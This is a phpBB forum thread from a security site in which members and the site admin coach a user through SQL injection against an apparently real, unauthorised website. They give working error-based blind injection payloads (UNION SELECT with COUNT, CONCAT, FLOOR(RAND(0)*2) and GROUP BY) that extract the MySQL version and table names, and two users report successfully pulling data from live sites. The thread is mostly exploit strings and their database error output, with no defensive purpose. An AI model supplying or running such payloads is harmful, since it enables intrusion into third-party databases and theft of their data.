 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Help with SQL query |
 |
 Posted: Mon Oct 18, 2010 9:02 pm |
 |
|
| dave06 |
| Regular user |
 |
|
| Joined: Oct 18, 2010 |
| Posts: 5 |
|
|
|
 |
|
 |
|
Hi,
I visited this forum and I love it because I understand a lot of here, but now I'm a problem.
I'm trying a sql injections, but I'm showing this error:
Errore 1222: The used SELECT statements have a different number of columns
query: | Code: | | index.php?var=1+union+select+*+from+information_schema.tables-- |
I try to change the queries but the error rest.
I need of a blind sql injection. Some1 help me please  |
|
|
|
|
| Posted: Tue Oct 19, 2010 1:27 am |
|
|
| pink_spider |
| Advanced user |
 |
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
| Use 'order by' to descovery the number of columns ^^ |
|
|
|
|
| Posted: Tue Oct 19, 2010 10:16 am |
|
|
| dave06 |
| Regular user |
|
|
| Joined: Oct 18, 2010 |
| Posts: 5 |
|
|
|
|
|
|
|
There are 13 columns.
I see normal page:
| Code: | | index.php?var=1+order+by+13-- |
I see an errorpage:
| Code: | | index.php?var=1+order+by+14-- |
ERROR: Unknown column '14' in 'order clause'.
So, i do this:
| Code: | | index.php?var=1+union+select+table_name,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables-- |
or
| Code: | | index.php?var=1+union+select+table_name,0,1,2,3,4,5,6,7,8,9,10,11+from+information_schema.tables-- |
But i retrive an error:
ERROR (translated by google translator in english): Error during query for the determination of path Navigation.
How I must do to fix it?
Thanks in advance =) |
|
|
|
|
| Posted: Tue Oct 19, 2010 1:03 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Are you able to see SQL error messages?
If so, then try this:
| Code: |
1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x+FROM+information_schema.tables+GROUP+BY+x--
|
|
|
|
|
|
| Posted: Tue Oct 19, 2010 1:26 pm |
|
|
| dave06 |
| Regular user |
|
|
| Joined: Oct 18, 2010 |
| Posts: 5 |
|
|
|
|
|
|
|
yes, i receive this error:
| Code: | | Error 1062: Duplicate entry '5.0.511' for key 1 |
|
|
|
|
|
| Posted: Tue Oct 19, 2010 1:40 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| dave06 wrote: | yes, i receive this error:
| Code: | | Error 1062: Duplicate entry '5.0.511' for key 1 |
|
This error messages proves, that exploit works - you can see MySql version.
By modifying example above various data can be fetched.
Need table names? Try this:
| Code: |
1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,COUNT(*),CONCAT((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=DATABASE()LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM +information_schema.tables+GROUP+BY+x--
|
|
|
|
|
|
| Posted: Tue Oct 19, 2010 2:48 pm |
|
|
| dave06 |
| Regular user |
|
|
| Joined: Oct 18, 2010 |
| Posts: 5 |
|
|
|
|
|
|
|
Well, I understand, but your queries give me that error:
Error 1062: Duplicate entry 're_ofc_az_schede_sel1' for key 1
How it is possible? 
EDIT: this is row names? 
Pls explain me |
|
|
|
|
|
|
|
|
| Posted: Tue Oct 19, 2010 5:06 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| dave06 wrote: | Well, I understand, but your queries give me that error:
Error 1062: Duplicate entry 're_ofc_az_schede_sel1' for key 1
How it is possible?
EDIT: this is row names?
Pls explain me |
"re_ofc_az_schede_sel" -> it's one of the table names.
This is advanced exploitation method, which can retrieve useful data through SQL error messages. Original idea comes from here:
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
| Code: |
[ 2 ] ERROR-BASED BLIND SQL INJECTION IN MYSQL
At the turn of the last year, Qwazar has got a universal technique of exploitation of Blind SQL Injection vulnerabilities in applications operating under MySQL database from the depths of forum.antichat.ru (I wonder what else can be found in these depths).
It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL>=5.0:
mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
|
|
|
|
|
|
|
|
|
|
| Posted: Tue Oct 19, 2010 5:41 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
| It is possible by ERROR BASED BLIND SQL INJECTION |
|
|
|
|
| Posted: Tue Oct 19, 2010 9:02 pm |
|
|
| dave06 |
| Regular user |
|
|
| Joined: Oct 18, 2010 |
| Posts: 5 |
|
|
|
|
|
|
|
Sooo...gr8! Success! I discovered the table name and the table columns.
Thanks a lot waraxe and pink_spider.  |
|
|
|
|
| Posted: Thu Oct 21, 2010 11:10 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Thank you for the technic waraxe, it will be interesting to try it indeed on injections where I was stuck because mysql was < 5
I was just trying it on an injection which works fine non blind
( I am curious like that. I suppose its a way to learn).
Is it supposed to work on any volunerable site? because I did not
get any results besides error with path.
of course I adjusted the number of columns to 14
| Code: | | &setID=-690+union+select+1,1,1,1,1,1,1,1,1,1,1,1,COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x+FROM+information_schema.tables+GROUP+BY+x-- |
| Quote: | | Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/space/name/of/saidsite/site/cover.inc.php on line 80 |
|
|
|
|
|
| Posted: Thu Oct 21, 2010 4:24 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
Use:
| Code: | | http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1) |
|
|
|
|
|
| Posted: Thu Oct 21, 2010 5:10 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
@RubberDoll ->
1. If MySql version is <5, then you can't use information_schema.
Information fetching via sql error messages is still possible in this case, but in other way and request must be repeated multiple times,
because successful response is random.
2. If you can't see "raw" MySql error messages and instead there are php error messages about failed sql related functions,
then only way to fetch useful information is bit-by-bit, using classical blind injection methods. |
|
|
|
|
|
|
|
|
| Posted: Fri Oct 22, 2010 9:38 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Waraxe, yes I know that information_schema is not available in mysql<5
but the paper you gave link above suggested some blind technic for these versions, which I'll have to try at least once to actually see the magic happens :)
| Quote: | If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more
complex queries based on the function rand(). It means that we will often fail to obtain the
necessary data with one http query. |
it will probably be hell for me, as I have very limitted close to no knowledge, but I'm a good learner, so with little patience and a lot of time, I just must try this
p.s.
The site I posted in my previous post is mysql>5 and fortunately I managed to get a lot of information from it but I tried your trick just to see the feedback it gives :)
Thanks again for your time, waraxe! |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 86
Members: 0
Total: 86
